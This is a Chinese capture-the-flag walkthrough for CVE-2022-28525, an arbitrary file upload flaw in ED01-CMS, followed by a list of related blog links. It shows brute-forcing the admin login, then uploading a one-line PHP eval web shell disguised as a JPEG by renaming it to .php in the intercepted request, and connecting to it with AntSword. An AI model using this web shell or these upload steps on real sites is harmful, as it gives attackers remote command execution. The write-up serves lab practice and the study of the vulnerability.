春秋云境 | 文件上传 | CVE-2022-28525

目录

靶标介绍

开启靶场

蚁剑连接

[获取 flag](#获取 flag)


靶标介绍

ED01-CMS v20180505 存在任意文件上传漏洞

开启靶场

发现了一个登录功能,使用 burp 爆破一下

爆破之后得到账号是 admin 密码是 admin,登录后是这样的页面

在左边的菜单栏挨着一个一个找,发现这个地方可以编辑用户的信息,可以修改头像上传头像

构造一个一句话木马,重命名为 1.jpg

复制代码
1.jpg:
<?php @eval($_POST[cmd]);?>

勾选 new image,上传 1.jpg, 然后抓包,修改后缀为 php,然后放包

放包之后,发现上传成功,右击复制图片链接

蚁剑连接

在根目录发现了 flag

获取 flag

相关推荐
一拳一个娘娘腔23 分钟前
第四章:深入系统底层 —— Root提权与内核漏洞
安全
kang0x03 小时前
Simple XOR - Writeup by AI
安全
小小工匠3 小时前
Spring AI RAG - 06 敏感词过滤与内容安全防护
人工智能·安全·spring
Bruce_Liuxiaowei3 小时前
AI攻防时间差:当漏洞发现速度碾压修复速度— 聚焦技术核心
网络·人工智能·网络安全·ai·系统安全
一切皆是因缘际会4 小时前
AI技术新风口:边缘计算与智能体协同,解锁产业落地新范式
大数据·人工智能·安全·ai·架构·语音识别
JiaWen技术圈5 小时前
网站开发中登录与注册安全防范完整指南
安全
天行健王春城老师5 小时前
制造业现场管理避坑,精益+6S实操方案(适配2026迭代)
经验分享
mzhan0175 小时前
Linux: config: CRYPTO_USER_API_AEAD
linux·安全·module
想你依然心痛5 小时前
HarmonyOS 6(API 23)实战:基于悬浮导航、沉浸光感与HMAF的“代码哨兵“——AI智能体代码安全审计平台
人工智能·安全·harmonyos·智能体
carrot112236 小时前
jsrpc+mitmproxy配置
网络安全·jsrpc